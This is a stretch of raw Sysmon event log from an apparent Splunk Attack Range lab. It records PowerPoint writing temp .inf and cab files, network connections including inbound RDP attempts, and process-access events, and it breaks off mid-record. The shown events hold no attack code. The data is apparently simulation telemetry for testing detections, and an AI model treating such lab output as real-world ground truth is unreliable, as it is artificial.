Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD40BA.tmp\content.infMD5=D7052608155B2599CDB50B8F9AAD7BD2,SHA256=577A765CD1FBE2B62887AD32EE0CF7DCD6FCF166772AFB5895F5E11C0C1386AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41B2.tmp\content.infMD5=23D59577F4AE6C6D1527A1B8CDB9AB19,SHA256=9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD419E.tmp\content.infMD5=76340C3F8A0BFCEDAB48B08C57D9B559,SHA256=78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD40B9.tmp\content.infMD5=2D8509303418A7C7E5C2590D70FA6BBC,SHA256=F6D3A404DC524E41E261C12BFB002762E2F3275E3F4FFF6533C481F15873C0F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD40BB.tmp\content.infMD5=77DEBFBA0B5B6B234F571A6A97E744F3,SHA256=DDEA979C345BDB9F5D33D673CD74C84B2C25A16DE1CAC1D2311FBB52E011C786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4060.tmpMD5=748A53C6BDD5CE97BD54A76C7A334286,SHA256=9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4179.tmp\Content.infMD5=2240CF2315F2EB448CEA6E9CE21B5AC5,SHA256=0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4191.tmp\Content.infMD5=6F8FE7B05855C203F6DEC5C31885DD08,SHA256=B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.138{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD418F.tmp\Content.infMD5=E8B30D1070779CC14FBE93C8F5CF65BE,SHA256=2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4190.tmp\Content.infMD5=3D52060B74D7D448DC733FFE5B92CB52,SHA256=BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD40B8.tmp\Content.infMD5=63E8B0621B5DEFE1EF17F02EFBFC2436,SHA256=9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4178.tmp\content.infMD5=133D126F0DE2CC4B29ECE38194983265,SHA256=08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD417E.tmp\Content.infMD5=16711B951E1130126E240A6E4CC2E382,SHA256=855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD40B7.tmp\Content.infMD5=A6B2731ECC78E7CED9ED5408AB4F2931,SHA256=6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.122{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4085.tmp\content.infMD5=92A2AE68F98D9D3037FB248C57EAE3AF,SHA256=A2EF06AAEEE6AFECA584F93CD70B018FE915C222D232EED569E990293BB72C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.106{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4064.tmpMD5=0EBC45AA0E67CC435D0745438371F948,SHA256=3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.075{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4083.tmp\content.infMD5=5728F26DF04D174DE9BDFF51D0668E2A,SHA256=979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.075{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD407F.tmp\content.infMD5=487E25E610F3FC2EEA27AB54324EA8F6,SHA256=022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.075{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4061.tmpMD5=89A9818E6658D73A73B642522FF8701F,SHA256=F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.059{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD407D.tmp\Content.infMD5=D04EC08EFE18D1611BDB9A5EC0CC00B1,SHA256=FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab405F.tmpMD5=F913DD84915753042D856CEC4E5DABA5,SHA256=AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab402F.tmpMD5=E3C64173B2F4AA7AB72E1396A9514BD8,SHA256=16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD407C.tmp\Content.infMD5=923D406B2170497AD4832F0AD3403168,SHA256=EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.119{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57611-false52.114.77.34-443https 354300x800000000000000081362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.110{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57612-false10.0.1.12-8000- 354300x800000000000000081361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.909{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44454-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.870{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52635-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.013{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4066.tmp\Content.infMD5=1A314B08BB9194A41E3794EF54017811,SHA256=9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050703Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:59.799{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74EF033321035BF099AFEB1BC494F052,SHA256=84B22F15437ABBC2D55D58AD1AE94C5F945E70E213458CAF5355A65FAD002C01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050702Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:59.643{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D8FB178D4373967A339F6BE3458E7441,SHA256=B7138F32C1DB1EEC2B4F94BF5D5C1B868C35F8B7E080D118355F04CD1C4B261C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050701Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.989{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61424-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050700Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:59.299{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2C3E3300FE930042F1918CC95308233,SHA256=106A030CDC81435C87F960481935F0EC2C92C350296E3A84A9CBFFBBA9745C57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC34-607E-630F-00000000BB01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC34-607E-630F-00000000BB01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.966{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC34-607E-630F-00000000BB01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.827{A7A01FEF-EC34-607E-630F-00000000BB01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.749{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55356-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.418{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57634-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.412{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57633-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.412{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57632-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.411{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57631-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.410{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57630-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.410{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57629-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.410{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57628-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.409{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57627-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.376{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57626-false184.24.4.122a184-24-4-122.deploy.static.akamaitechnologies.com443https 354300x800000000000000081465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.369{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58537- 354300x800000000000000081464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.189{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57625-false10.0.1.12-8089- 354300x800000000000000081463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 